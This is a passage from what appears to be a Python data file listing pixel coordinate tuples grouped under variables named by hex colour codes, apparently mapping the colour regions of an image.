(150, 98), (150, 99), (150, 100), (150, 101), (150, 102), (150, 103), (150, 104), (150, 105), (150, 106), (150, 107), (150, 108), (150, 109), (150, 110), (150, 111), (150, 112), (150, 113), (150, 114), (150, 115), (150, 116), (150, 118), (150, 119), (150, 120), (150, 121), (150, 122), (150, 124), (150, 128), (150, 139), (151, 87), (151, 89), (151, 90), (151, 91), (151, 92), (151, 93), (151, 94), (151, 95), (151, 96), (151, 97), (151, 98), (151, 99), (151, 100), (151, 101), (151, 102), (151, 103), (151, 104), (151, 105), (151, 106), (151, 107), (151, 108), (151, 109), (151, 112), (151, 113), (151, 114), (151, 115), (151, 116), (151, 119), (151, 120), (151, 121), (151, 122), (151, 124), (151, 129), (151, 138), (151, 139), (152, 87), (152, 89), (152, 90), (152, 91), (152, 92), (152, 93), (152, 94), (152, 95), (152, 96), (152, 97),
(152, 98), (152, 99), (152, 104), (152, 105), (152, 106), (152, 107), (152, 108), (152, 109), (152, 111), (152, 112), (152, 113), (152, 114), (152, 115), (152, 116), (152, 117), (152, 118), (152, 120), (152, 121), (152, 122), (152, 123), (152, 124), (152, 126), (152, 129), (152, 136), (152, 138), (153, 87), (153, 89), (153, 90), (153, 91), (153, 92), (153, 93), (153, 94), (153, 95), (153, 96), (153, 97), (153, 98), (153, 101), (153, 102), (153, 103), (153, 106), (153, 107), (153, 109), (153, 119), (153, 121), (153, 122), (153, 123), (153, 124), (153, 127), (153, 129), (153, 135), (153, 137), (154, 86), (154, 87), (154, 88), (154, 92), (154, 93), (154, 94), (154, 95), (154, 96), (154, 97), (154, 99), (154, 104), (154, 109), (154, 120), (154, 122), (154, 123), (154, 124), (154, 125), (154, 126), (154, 127), (154, 128), (154, 129),
(154, 130), (154, 133), (154, 136), (155, 86), (155, 90), (155, 91), (155, 93), (155, 94), (155, 95), (155, 96), (155, 98), (155, 106), (155, 108), (155, 121), (155, 123), (155, 124), (155, 125), (155, 126), (155, 127), (155, 128), (155, 129), (155, 132), (155, 136), (156, 86), (156, 88), (156, 92), (156, 94), (156, 95), (156, 96), (156, 98), (156, 122), (156, 124), (156, 125), (156, 126), (156, 127), (156, 128), (156, 129), (156, 130), (156, 133), (156, 134), (156, 136), (157, 86), (157, 93), (157, 95), (157, 96), (157, 98), (157, 122), (157, 124), (157, 125), (157, 126), (157, 127), (157, 128), (157, 129), (157, 130), (157, 131), (157, 132), (157, 133), (157, 134), (157, 136), (158, 94), (158, 96), (158, 98), (158, 123), (158, 128), (158, 129), (158, 130), (158, 131), (158, 132), (158, 133), (158, 134), (158, 135), (158, 136),
(158, 141), (158, 142), (158, 144), (159, 95), (159, 98), (159, 124), (159, 126), (159, 129), (159, 130), (159, 131), (159, 136), (159, 139), (159, 143), (160, 95), (160, 98), (160, 128), (160, 130), (160, 131), (160, 133), (160, 134), (160, 137), (160, 138), (160, 141), (161, 94), (161, 96), (161, 98), (161, 129), (161, 131), (161, 136), (161, 138), (161, 140), (162, 93), (162, 95), (162, 96), (162, 98), (162, 129), (162, 131), (162, 137), (162, 139), (163, 92), (163, 96), (163, 97), (163, 99), (163, 115), (163, 130), (163, 131), (163, 138), (163, 139), (164, 91), (164, 93), (164, 94), (164, 95), (164, 96), (164, 97), (164, 98), (164, 101), (164, 131), (164, 139), (165, 90), (165, 92), (165, 96), (165, 98), (165, 99), (165, 102), (165, 103), (165, 114), (165, 131), (166, 90), (166, 96), (166, 98), (166, 99), (166, 100),
(166, 101), (166, 106), (166, 114), (166, 131), (167, 96), (167, 98), (167, 99), (167, 103), (167, 104), (167, 105), (167, 107), (167, 131), (167, 132), (168, 95), (168, 101), (168, 102), (168, 108), (168, 131), (168, 133), (169, 95), (169, 97), (169, 98), (169, 99), (169, 131), (170, 131), (170, 134), (170, 135), (171, 114), (171, 122), (171, 130), (171, 132), (172, 112), (172, 114), (172, 130), (172, 131), (173, 112), (173, 114), (173, 130), (174, 114), (174, 122), (174, 139), (175, 113), )
coordinates_E1E1E1 = ((68, 122),
(68, 123), (68, 131), (68, 132), (69, 116), (69, 123), (69, 132), (70, 116), (70, 118), (70, 119), (70, 120), (70, 123), (71, 99), (71, 100), (71, 116), (71, 118), (71, 119), (71, 122), (71, 123), (72, 98), (72, 100), (72, 116), (72, 121), (72, 124), (73, 98), (73, 100), (73, 122), (73, 124), (73, 148), (73, 149), (74, 98), (74, 100), (74, 122), (74, 124), (74, 137), (74, 147), (74, 148), (75, 99), (75, 100), (75, 123), (75, 124), (75, 134), (75, 135), (75, 137), (75, 147), (76, 100), (76, 123), (76, 124), (76, 133), (76, 137), (77, 100), (77, 123), (77, 124), (77, 135), (78, 100), (78, 124), (78, 132), (78, 133), (78, 138), (79, 100), (79, 103), (79, 124), (79, 131), (79, 132), (79, 138), (79, 139), (80, 99), (80, 104), (80, 124), (80, 132), (80, 140), (81, 97), (81, 101),
(81, 103), (81, 105), (81, 123), (81, 124), (81, 130), (81, 131), (82, 95), (82, 96), (82, 100), (82, 105), (82, 106), (82, 122), (82, 124), (82, 130), (82, 131), (83, 92), (83, 93), (83, 97), (83, 99), (83, 106), (83, 122), (83, 125), (83, 130), (83, 131), (84, 84), (84, 86), (84, 87), (84, 88), (84, 89), (84, 90), (84, 91), (84, 92), (84, 93), (84, 95), (84, 96), (84, 98), (84, 121), (84, 123), (84, 124), (84, 125), (84, 126), (84, 127), (84, 128), (84, 129), (84, 131), (85, 84), (85, 88), (85, 89), (85, 90), (85, 95), (85, 96), (85, 98), (85, 120), (85, 122), (85, 123), (85, 124), (85, 125), (85, 130), (85, 131), (85, 145), (85, 146), (86, 85), (86, 95), (86, 97), (86, 120), (86, 122), (86, 123), (86, 124), (86, 125), (86, 126), (86, 127), (86, 128),
(86, 129), (86, 130), (86, 132), (86, 144), (87, 95), (87, 97), (87, 119), (87, 121), (87, 122), (87, 123), (87, 124), (87, 125), (87, 126), (87, 127), (87, 128), (87, 129), (87, 130), (87, 131), (87, 134), (87, 142), (88, 97), (88, 118), (88, 120), (88, 121), (88, 122), (88, 123), (88, 124), (88, 125), (88, 126), (88, 127), (88, 128), (88, 129), (88, 130), (88, 131), (88, 132), (88, 135), (88, 140), (89, 96), (89, 98), (89, 117), (89, 119), (89, 120), (89, 121), (89, 122), (89, 123), (89, 124), (89, 125), (89, 126), (89, 127), (89, 128), (89, 129), (89, 130), (89, 131), (89, 132), (89, 133), (89, 134), (89, 136), (89, 137), (89, 138), (90, 96), (90, 99), (90, 116), (90, 118), (90, 119), (90, 120), (90, 121), (90, 122), (90, 123), (90, 124), (90, 125), (90, 126), (90, 127),
(90, 128), (90, 129), (90, 130), (90, 131), (90, 132), (90, 135), (91, 96), (91, 98), (91, 101), (91, 117), (91, 118), (91, 119), (91, 120), (91, 121), (91, 122), (91, 123), (91, 124), (91, 125), (91, 129), (91, 130), (91, 131), (91, 133), (91, 136), (91, 137), (91, 139), (92, 96), (92, 98), (92, 99), (92, 102), (92, 113), (92, 116), (92, 117), (92, 118), (92, 119), (92, 120), (92, 121), (92, 122), (92, 123), (92, 126), (92, 127), (92, 129), (92, 130), (92, 131), (92, 135), (92, 138), (93, 85), (93, 96), (93, 98), (93, 99), (93, 100), (93, 101), (93, 104), (93, 105), (93, 106), (93, 107), (93, 108), (93, 109), (93, 110), (93, 111), (93, 112), (93, 115), (93, 116), (93, 117), (93, 118), (93, 119), (93, 120), (93, 121), (93, 122), (93, 123), (93, 124), (93, 125), (93, 129),
(93, 131), (93, 136), (93, 138), (94, 84), (94, 85), (94, 96), (94, 98), (94, 99), (94, 100), (94, 101), (94, 102), (94, 103), (94, 113), (94, 114), (94, 115), (94, 116), (94, 117), (94, 118), (94, 119), (94, 120), (94, 121), (94, 122), (94, 129), (94, 130), (94, 137), (94, 138), (95, 83), (95, 96), (95, 98), (95, 99), (95, 100), (95, 101), (95, 102), (95, 103), (95, 104), (95, 105), (95, 106), (95, 107), (95, 108), (95, 109), (95, 110), (95, 111), (95, 112), (95, 113), (95, 114), (95, 115), (95, 116), (95, 117), (95, 118), (95, 119), (95, 120), (95, 122), (95, 129), (95, 130), (96, 75), (96, 77), (96, 82), (96, 83), (96, 95), (96, 97), (96, 98), (96, 99), (96, 100), (96, 101), (96, 102), (96, 103), (96, 104), (96, 105), (96, 106), (96, 107), (96, 108), (96, 109),
(96, 110), (96, 111), (96, 112), (96, 115), (96, 116), (96, 117), (96, 118), (96, 119), (96, 120), (96, 122), (96, 129), (96, 130), (97, 75), (97, 78), (97, 79), (97, 80), (97, 82), (97, 95), (97, 97), (97, 98), (97, 99), (97, 100), (97, 101), (97, 102), (97, 103), (97, 104), (97, 105), (97, 106), (97, 107), (97, 108), (97, 109), (97, 110), (97, 113), (97, 114), (97, 117), (97, 118), (97, 119), (97, 120), (97, 122), (97, 128), (97, 130), (98, 76), (98, 81), (98, 96), (98, 98), (98, 99), (98, 100), (98, 101), (98, 102), (98, 103), (98, 104), (98, 105), (98, 106), (98, 107), (98, 108), (98, 109), (98, 112), (98, 115), (98, 116), (98, 118), (98, 119), (98, 120), (98, 121), (98, 123), (98, 127), (98, 130), (99, 76), (99, 79), (99, 81), (99, 96), (99, 98), (99, 99),
(99, 100), (99, 101), (99, 102), (99, 103), (99, 104), (99, 105), (99, 106), (99, 107), (99, 108), (99, 110), (99, 117), (99, 119), (99, 120), (99, 121), (99, 122), (99, 125), (99, 129), (99, 131), (100, 77), (100, 80), (100, 96), (100, 98), (100, 99), (100, 100), (100, 101), (100, 102), (100, 103), (100, 104), (100, 105), (100, 106), (100, 107), (100, 109), (100, 118), (100, 124), (100, 130), (100, 132), (101, 79), (101, 81), (101, 96), (101, 98), (101, 99), (101, 100), (101, 101), (101, 102), (101, 103), (101, 104), (101, 105), (101, 106), (101, 107), (101, 109), (101, 119), (101, 121), (101, 122), (101, 124), (101, 130), (101, 133), (102, 80), (102, 88), (102, 90), (102, 95), (102, 96), (102, 97), (102, 98), (102, 99), (102, 100), (102, 101), (102, 102), (102, 103), (102, 104), (102, 105), (102, 106), (102, 108),
(102, 124), (102, 130), (102, 134), (103, 81), (103, 83), (103, 86), (103, 87), (103, 91), (103, 92), (103, 93), (103, 96), (103, 97), (103, 98), (103, 99), (103, 100), (103, 101), (103, 102), (103, 103), (103, 104), (103, 105), (103, 106), (103, 107), (103, 108), (103, 124), (103, 130), (103, 133), (104, 82), (104, 84), (104, 85), (104, 88), (104, 89), (104, 90), (104, 95), (104, 96), (104, 97), (104, 98), (104, 99), (104, 100), (104, 101), (104, 102), (104, 103), (104, 104), (104, 105), (104, 107), (104, 131), (105, 83), (105, 86), (105, 87), (105, 88), (105, 89), (105, 90), (105, 91), (105, 92), (105, 93), (105, 94), (105, 95), (105, 96), (105, 97), (105, 98), (105, 99), (105, 100), (105, 101), (105, 102), (105, 103), (105, 104), (105, 105), (105, 107), (105, 131), (106, 84), (106, 86), (106, 87), (106, 88),
(106, 94), (106, 95), (106, 96), (106, 97), (106, 98), (106, 99), (106, 100), (106, 101), (106, 102), (106, 103), (106, 104), (106, 105), (106, 107), (106, 130), (106, 131), (107, 84), (107, 86), (107, 87), (107, 89), (107, 90), (107, 91), (107, 92), (107, 93), (107, 95), (107, 96), (107, 97), (107, 98), (107, 99), (107, 100), (107, 101), (107, 102), (107, 103), (107, 104), (107, 105), (107, 107), (107, 130), (107, 131), (108, 71), (108, 73), (108, 74), (108, 75), (108, 76), (108, 83), (108, 85), (108, 86), (108, 88), (108, 94), (108, 96), (108, 97), (108, 98), (108, 99), (108, 104), (108, 105), (108, 107), (108, 130), (108, 131), (109, 70), (109, 77), (109, 78), (109, 79), (109, 80), (109, 81), (109, 84), (109, 85), (109, 87), (109, 95), (109, 97), (109, 98), (109, 101), (109, 102), (109, 103), (109, 105),
(109, 107), (109, 130), (109, 131), (110, 70), (110, 72), (110, 73), (110, 74), (110, 75), (110, 76), (110, 79), (110, 82), (110, 86), (110, 95), (110, 97), (110, 99), (110, 104), (110, 107), (110, 131), (111, 71), (111, 75), (111, 77), (111, 78), (111, 84), (111, 86), (111, 96), (111, 98), (111, 105), (111, 108), (111, 112), (111, 129), (112, 75), (112, 77), (112, 85), (112, 87), (112, 96), (112, 98), (112, 106), (112, 108), (112, 109), (112, 112), (112, 114), (113, 75), (113, 77), (113, 87), (113, 96), (113, 97), (113, 107), (113, 110), (113, 115), (114, 75), (114, 77), (114, 96), (114, 97), (114, 108), (114, 116), (115, 74), (115, 77), (115, 96), (115, 109), (115, 111), (115, 112), (115, 113), (115, 114), (115, 115), (115, 117), (116, 78), (116, 96), (117, 78), (118, 78), (118, 79), )
coordinates_771286 = ((149, 126),
(150, 126), )
coordinates_781286 = ((94, 127),
(95, 125), (95, 127), (96, 127), (97, 125), (97, 126), )
coordinates_EFE68C = ((165, 124),
(165, 126), (166, 121), (166, 123), (166, 127), (167, 120), (167, 124), (167, 125), (167, 127), (168, 120), (168, 122), (168, 123), (168, 124), (168, 126), (168, 127), (169, 120), (169, 122), (169, 123), (169, 124), (169, 126), (170, 120), (170, 122), (170, 123), (170, 124), (170, 126), (171, 120), (171, 122), (171, 123), (171, 124), (171, 126), (172, 120), (172, 122), (172, 123), (172, 124), (172, 126), (173, 120), (173, 122), (173, 123), (173, 124), (173, 126), (174, 120), (174, 122), (174, 123), (174, 124), (174, 126), (175, 120), (175, 122), (175, 123), (175, 124), (175, 126), (176, 120), (176, 122), (176, 123), (176, 124), (176, 126), (177, 120), (177, 122), (177, 123), (177, 124), (177, 126), (178, 120), (178, 122), (178, 123), (178, 124), (178, 126), (179, 120), (179, 122), (179, 123), (179, 124), (179, 126), (180, 120), (180, 122), (180, 123),
(180, 126), (181, 120), (181, 125), (182, 121), (182, 123), )
coordinates_31CD32 = ((170, 147),
(170, 149), (171, 138), (171, 145), (172, 135), (172, 140), (172, 141), (172, 142), (172, 143), (172, 144), (172, 147), (172, 149), (173, 135), (173, 138), (173, 139), (173, 145), (173, 146), (173, 147), (173, 149), (174, 134), (174, 136), (174, 137), (174, 138), (174, 139), (174, 140), (174, 141), (174, 142), (174, 143), (174, 144), (174, 145), (174, 146), (174, 147), (174, 149), (175, 134), (175, 136), (175, 137), (175, 138), (175, 139), (175, 140), (175, 141), (175, 142), (175, 143), (175, 144), (175, 145), (175, 146), (175, 147), (175, 149), (176, 133), (176, 135), (176, 136), (176, 137), (176, 140), (176, 141), (176, 142), (176, 143), (176, 144), (176, 145), (176, 146), (176, 147), (176, 149), (177, 133), (177, 135), (177, 136), (177, 137), (177, 141), (177, 142), (177, 143), (177, 148), (178, 132), (178, 134), (178, 135), (178, 137), (178, 140),
(178, 144), (178, 145), (178, 147), (179, 133), (179, 135), (179, 137), (179, 141), (179, 143), (180, 133), (180, 136), (181, 134), (181, 136), (182, 134), (182, 135), )
coordinates_F0E68C = ((63, 129),
(63, 131), (63, 132), (63, 133), (63, 135), (64, 128), (64, 137), (65, 127), (65, 129), (65, 132), (65, 134), (65, 135), (65, 139), (66, 127), (66, 130), (66, 133), (66, 135), (66, 136), (66, 137), (66, 141), (67, 127), (67, 129), (67, 134), (67, 136), (67, 137), (67, 138), (67, 139), (67, 142), (68, 127), (68, 129), (68, 134), (68, 136), (68, 137), (68, 138), (68, 139), (68, 140), (68, 141), (68, 143), (69, 127), (69, 129), (69, 134), (69, 136), (69, 137), (69, 138), (69, 141), (69, 142), (69, 144), (70, 126), (70, 129), (70, 130), (70, 133), (70, 134), (70, 136), (70, 137), (70, 138), (70, 139), (70, 140), (70, 141), (70, 143), (71, 126), (71, 128), (71, 133), (71, 134), (71, 135), (71, 138), (71, 141), (71, 143), (72, 126), (72, 128), (72, 131), (72, 136), (72, 138), (72, 141),
(72, 142), (73, 126), (73, 128), (73, 129), (73, 130), (73, 134), (73, 139), (73, 141), (74, 126), (74, 128), (74, 131), (74, 133), (74, 139), (75, 126), (75, 128), (75, 129), (75, 130), (75, 132), (75, 139), (76, 126), (76, 128), (76, 129), (76, 131), (77, 127), (77, 130), (78, 127), (78, 129), (79, 127), (79, 129), (80, 127), (80, 128), (81, 128), (82, 127), (82, 128), )
coordinates_32CD32 = ((67, 147),
(67, 149), (68, 146), (68, 150), (69, 146), (69, 148), (69, 149), (69, 151), (70, 145), (70, 146), (70, 147), (70, 148), (70, 149), (70, 150), (70, 152), (71, 145), (71, 147), (71, 148), (71, 149), (71, 150), (71, 152), (72, 144), (72, 146), (72, 147), (72, 148), (72, 149), (72, 150), (72, 151), (72, 153), (73, 143), (73, 145), (73, 146), (73, 147), (73, 148), (73, 149), (73, 150), (73, 151), (73, 153), (74, 142), (74, 144), (74, 145), (74, 146), (74, 147), (74, 148), (74, 149), (74, 150), (74, 151), (74, 153), (75, 141), (75, 143), (75, 144), (75, 145), (75, 146), (75, 147), (75, 148), (75, 149), (75, 150), (75, 151), (75, 153), (76, 140), (76, 142), (76, 143), (76, 144), (76, 145), (76, 146), (76, 147), (76, 148), (76, 149), (76, 150), (76, 153), (77, 140), (77, 142), (77, 143),
(77, 144), (77, 145), (77, 146), (77, 147), (77, 148), (77, 151), (77, 153), (78, 140), (78, 142), (78, 143), (78, 144), (78, 145), (78, 146), (78, 149), (78, 150), (79, 134), (79, 135), (79, 142), (79, 144), (79, 145), (79, 148), (80, 134), (80, 136), (80, 142), (80, 146), (81, 133), (81, 135), (81, 138), (81, 142), (81, 145), (82, 133), (82, 135), (82, 136), (82, 139), (82, 140), (82, 143), (83, 133), (83, 135), (83, 136), (83, 137), (83, 138), (83, 142), (84, 133), (84, 140), (84, 141), (85, 134), (85, 136), (85, 137), (85, 139), )
coordinates_DCF8A4 = ((90, 164),
(91, 159), (91, 164), (92, 159), (92, 160), (92, 164), (93, 159), (93, 160), (93, 163), (93, 164), (94, 159), (94, 165), (95, 159), (95, 163), (95, 164), (95, 166), (96, 159), (96, 161), (96, 162), (96, 163), (96, 164), (96, 166), (97, 159), (97, 161), (97, 162), (97, 163), (97, 165), (98, 159), (98, 161), (98, 162), (98, 164), (99, 158), (99, 160), (99, 161), (99, 162), (99, 164), (100, 158), (100, 160), (100, 161), (100, 162), (100, 164), (101, 158), (101, 160), (101, 161), (101, 162), (101, 164), (102, 149), (102, 158), (102, 160), (102, 161), (102, 162), (102, 164), (103, 157), (103, 159), (103, 160), (103, 161), (103, 162), (103, 164), (104, 150), (104, 156), (104, 158), (104, 159), (104, 160), (104, 161), (104, 162), (104, 164), (105, 150), (105, 155), (105, 157), (105, 158), (105, 159), (105, 160), (105, 161),
(105, 162), (105, 164), (106, 151), (106, 154), (106, 156), (106, 157), (106, 158), (106, 159), (106, 160), (106, 161), (106, 162), (106, 164), (107, 151), (107, 153), (107, 155), (107, 156), (107, 157), (107, 158), (107, 159), (107, 160), (107, 161), (107, 162), (107, 164), (108, 151), (108, 154), (108, 155), (108, 156), (108, 157), (108, 158), (108, 159), (108, 160), (108, 161), (108, 162), (108, 164), (109, 151), (109, 153), (109, 154), (109, 155), (109, 156), (109, 157), (109, 158), (109, 159), (109, 160), (109, 161), (109, 162), (109, 164), (110, 150), (110, 152), (110, 153), (110, 154), (110, 155), (110, 156), (110, 157), (110, 158), (110, 159), (110, 160), (110, 161), (110, 162), (110, 164), (111, 150), (111, 152), (111, 153), (111, 154), (111, 155), (111, 156), (111, 157), (111, 158), (111, 159), (111, 160), (111, 161), (111, 162), (111, 164),
(112, 149), (112, 151), (112, 152), (112, 153), (112, 154), (112, 155), (112, 156), (112, 157), (112, 158), (112, 159), (112, 160), (112, 161), (112, 162), (112, 164), (113, 149), (113, 151), (113, 152), (113, 153), (113, 154), (113, 155), (113, 156), (113, 157), (113, 158), (113, 159), (113, 160), (113, 161), (113, 163), (114, 149), (114, 151), (114, 152), (114, 153), (114, 154), (114, 155), (114, 156), (114, 157), (114, 158), (114, 159), (114, 160), (114, 162), (115, 149), (115, 151), (115, 152), (115, 153), (115, 154), (115, 155), (115, 156), (115, 157), (115, 158), (115, 161), (116, 149), (116, 151), (116, 152), (116, 153), (116, 154), (116, 155), (116, 156), (116, 159), (116, 160), (116, 161), (117, 149), (117, 152), (117, 153), (117, 154), (117, 157), (117, 158), (118, 150), (118, 156), (119, 152), (119, 154), )
coordinates_DBF8A4 = ((126, 155),
(127, 157), (128, 152), (128, 155), (128, 156), (128, 159), (128, 161), (129, 151), (129, 153), (129, 154), (129, 155), (129, 156), (129, 157), (129, 158), (129, 161), (130, 151), (130, 153), (130, 154), (130, 155), (130, 156), (130, 157), (130, 158), (130, 159), (130, 160), (130, 162), (131, 151), (131, 153), (131, 154), (131, 155), (131, 156), (131, 157), (131, 158), (131, 159), (131, 160), (131, 162), (132, 151), (132, 153), (132, 154), (132, 155), (132, 156), (132, 157), (132, 158), (132, 159), (132, 160), (132, 161), (132, 163), (133, 150), (133, 152), (133, 153), (133, 154), (133, 155), (133, 156), (133, 157), (133, 158), (133, 159), (133, 160), (133, 161), (133, 163), (134, 150), (134, 152), (134, 153), (134, 154), (134, 155), (134, 156), (134, 157), (134, 158), (134, 159), (134, 160), (134, 161), (134, 163), (135, 150), (135, 152), (135, 153),
(135, 154), (135, 155), (135, 156), (135, 157), (135, 158), (135, 159), (135, 160), (135, 161), (135, 162), (135, 163), (135, 164), (136, 150), (136, 152), (136, 153), (136, 154), (136, 155), (136, 156), (136, 157), (136, 158), (136, 159), (136, 160), (136, 161), (136, 162), (136, 164), (137, 150), (137, 152), (137, 153), (137, 154), (137, 155), (137, 156), (137, 157), (137, 158), (137, 159), (137, 160), (137, 161), (137, 162), (137, 164), (138, 151), (138, 153), (138, 154), (138, 155), (138, 156), (138, 157), (138, 158), (138, 159), (138, 160), (138, 161), (138, 162), (138, 164), (139, 151), (139, 155), (139, 156), (139, 157), (139, 158), (139, 159), (139, 160), (139, 161), (139, 162), (139, 164), (140, 151), (140, 153), (140, 154), (140, 157), (140, 158), (140, 159), (140, 160), (140, 161), (140, 162), (140, 164), (141, 152), (141, 157), (141, 158),
(141, 159), (141, 160), (141, 161), (141, 162), (141, 164), (142, 150), (142, 151), (142, 156), (142, 158), (142, 159), (142, 160), (142, 161), (142, 162), (142, 164), (143, 150), (143, 157), (143, 159), (143, 160), (143, 161), (143, 162), (143, 164), (144, 158), (144, 160), (144, 161), (144, 162), (144, 164), (145, 158), (145, 160), (145, 161), (145, 162), (145, 163), (145, 165), (146, 159), (146, 161), (146, 162), (146, 163), (146, 165), (147, 159), (147, 161), (147, 162), (147, 163), (147, 164), (147, 166), (148, 160), (148, 162), (148, 163), (148, 164), (148, 165), (149, 160), (149, 162), (149, 163), (149, 164), (149, 165), (149, 166), (149, 169), (150, 160), (150, 162), (150, 163), (150, 165), (150, 168), (150, 170), (151, 160), (151, 162), (151, 163), (151, 165), (151, 169), (151, 171), (152, 159), (152, 160), (152, 163), (152, 165), (152, 170),
(152, 171), (153, 159), (153, 162), (153, 165), (154, 159), (154, 160), (154, 163), (154, 165), (155, 158), (155, 159), (155, 164), (155, 165), (156, 158), (156, 159), (156, 164), (156, 165), (157, 159), (157, 164), (157, 166), (158, 157), (158, 158), (158, 165), (158, 166), (159, 157), (159, 158), (159, 165), (159, 166), (160, 158), (161, 158), (163, 157), (164, 157), )
coordinates_60CC60 = ((74, 161),
(74, 163), (75, 159), (75, 164), (76, 157), (76, 161), (76, 162), (76, 163), (76, 165), (77, 156), (77, 159), (77, 160), (77, 161), (77, 162), (77, 163), (77, 164), (77, 166), (78, 157), (78, 158), (78, 159), (78, 160), (78, 161), (78, 162), (78, 163), (78, 164), (78, 165), (78, 169), (79, 155), (79, 157), (79, 158), (79, 159), (79, 160), (79, 161), (79, 162), (79, 163), (79, 164), (79, 165), (79, 166), (79, 170), (80, 155), (80, 157), (80, 158), (80, 159), (80, 160), (80, 161), (80, 162), (80, 163), (80, 164), (80, 165), (80, 166), (80, 167), (80, 168), (80, 169), (80, 171), (81, 155), (81, 157), (81, 158), (81, 159), (81, 160), (81, 161), (81, 162), (81, 163), (81, 164), (81, 165), (81, 166), (81, 167), (81, 168), (81, 169), (81, 171), (82, 154), (82, 156), (82, 157), (82, 158),
(82, 159), (82, 160), (82, 161), (82, 162), (82, 163), (82, 164), (82, 165), (82, 166), (82, 167), (82, 168), (82, 169), (82, 170), (82, 172), (83, 154), (83, 156), (83, 157), (83, 158), (83, 159), (83, 160), (83, 161), (83, 162), (83, 163), (83, 164), (83, 165), (83, 166), (83, 167), (83, 168), (83, 169), (83, 170), (83, 172), (84, 154), (84, 156), (84, 157), (84, 158), (84, 159), (84, 160), (84, 161), (84, 162), (84, 163), (84, 164), (84, 165), (84, 166), (84, 167), (84, 168), (84, 169), (84, 170), (84, 171), (84, 173), (85, 153), (85, 155), (85, 156), (85, 157), (85, 158), (85, 159), (85, 160), (85, 161), (85, 162), (85, 163), (85, 164), (85, 165), (85, 166), (85, 167), (85, 168), (85, 169), (85, 170), (85, 171), (85, 173), (86, 153), (86, 155), (86, 156), (86, 157), (86, 159),
(86, 160), (86, 161), (86, 162), (86, 163), (86, 164), (86, 165), (86, 166), (86, 167), (86, 168), (86, 169), (86, 170), (86, 171), (86, 172), (86, 174), (87, 152), (87, 154), (87, 155), (87, 156), (87, 157), (87, 160), (87, 161), (87, 162), (87, 163), (87, 166), (87, 167), (87, 168), (87, 169), (87, 170), (87, 171), (87, 172), (87, 173), (87, 175), (88, 152), (88, 154), (88, 155), (88, 156), (88, 160), (88, 161), (88, 162), (88, 165), (88, 166), (88, 167), (88, 168), (88, 169), (88, 170), (88, 171), (88, 172), (88, 173), (88, 175), (89, 151), (89, 153), (89, 154), (89, 156), (89, 160), (89, 163), (89, 166), (89, 168), (89, 169), (89, 170), (89, 171), (89, 172), (89, 173), (89, 174), (89, 176), (90, 151), (90, 153), (90, 154), (90, 156), (90, 161), (90, 162), (90, 166), (90, 168),
(90, 169), (90, 170), (90, 171), (90, 172), (90, 173), (90, 174), (90, 175), (90, 176), (91, 150), (91, 152), (91, 153), (91, 154), (91, 156), (91, 161), (91, 162), (91, 166), (91, 168), (91, 169), (91, 170), (91, 171), (91, 172), (91, 173), (91, 174), (91, 175), (91, 177), (92, 149), (92, 151), (92, 152), (92, 153), (92, 154), (92, 155), (92, 157), (92, 166), (92, 168), (92, 169), (92, 170), (92, 171), (92, 172), (92, 173), (92, 174), (92, 175), (92, 177), (93, 148), (93, 150), (93, 151), (93, 152), (93, 153), (93, 154), (93, 155), (93, 157), (93, 167), (93, 169), (93, 170), (93, 171), (93, 172), (93, 173), (93, 174), (93, 175), (93, 177), (94, 148), (94, 150), (94, 151), (94, 152), (94, 153), (94, 154), (94, 155), (94, 157), (94, 168), (94, 170), (94, 171), (94, 172), (94, 173),
(94, 174), (94, 175), (94, 177), (95, 148), (95, 150), (95, 151), (95, 152), (95, 153), (95, 154), (95, 156), (95, 168), (95, 170), (95, 171), (95, 172), (95, 173), (95, 174), (95, 175), (95, 177), (96, 147), (96, 149), (96, 150), (96, 151), (96, 152), (96, 153), (96, 154), (96, 156), (96, 168), (96, 170), (96, 171), (96, 172), (96, 173), (96, 174), (96, 175), (96, 177), (97, 146), (97, 148), (97, 149), (97, 150), (97, 151), (97, 152), (97, 153), (97, 154), (97, 155), (97, 157), (97, 167), (97, 169), (97, 170), (97, 171), (97, 172), (97, 173), (97, 174), (97, 175), (97, 177), (98, 147), (98, 149), (98, 150), (98, 151), (98, 152), (98, 153), (98, 154), (98, 155), (98, 157), (98, 167), (98, 169), (98, 170), (98, 171), (98, 172), (98, 173), (98, 174), (98, 175), (98, 176), (98, 178),
(99, 145), (99, 147), (99, 148), (99, 150), (99, 151), (99, 152), (99, 153), (99, 154), (99, 156), (99, 166), (99, 168), (99, 169), (99, 170), (99, 171), (99, 172), (99, 173), (99, 174), (99, 175), (99, 176), (99, 178), (100, 145), (100, 146), (100, 150), (100, 151), (100, 152), (100, 153), (100, 154), (100, 156), (100, 166), (100, 168), (100, 169), (100, 170), (100, 171), (100, 172), (100, 173), (100, 174), (100, 175), (100, 176), (100, 178), (101, 144), (101, 147), (101, 150), (101, 152), (101, 153), (101, 154), (101, 156), (101, 166), (101, 168), (101, 169), (101, 170), (101, 171), (101, 172), (101, 173), (101, 174), (101, 175), (101, 176), (101, 178), (102, 143), (102, 145), (102, 147), (102, 151), (102, 153), (102, 155), (102, 166), (102, 168), (102, 169), (102, 170), (102, 171), (102, 172), (102, 173), (102, 174), (102, 175),
(102, 176), (102, 178), (103, 142), (103, 144), (103, 145), (103, 147), (103, 151), (103, 155), (103, 166), (103, 168), (103, 169), (103, 170), (103, 171), (103, 172), (103, 173), (103, 174), (103, 175), (103, 176), (103, 178), (104, 142), (104, 144), (104, 145), (104, 146), (104, 148), (104, 152), (104, 154), (104, 166), (104, 168), (104, 169), (104, 170), (104, 171), (104, 172), (104, 173), (104, 174), (104, 175), (104, 176), (104, 178), (105, 141), (105, 143), (105, 144), (105, 145), (105, 146), (105, 148), (105, 153), (105, 166), (105, 168), (105, 169), (105, 170), (105, 171), (105, 172), (105, 173), (105, 174), (105, 175), (105, 176), (105, 178), (106, 141), (106, 143), (106, 144), (106, 145), (106, 146), (106, 147), (106, 149), (106, 166), (106, 168), (106, 169), (106, 170), (106, 171), (106, 172), (106, 173), (106, 174), (106, 175), (106, 176),
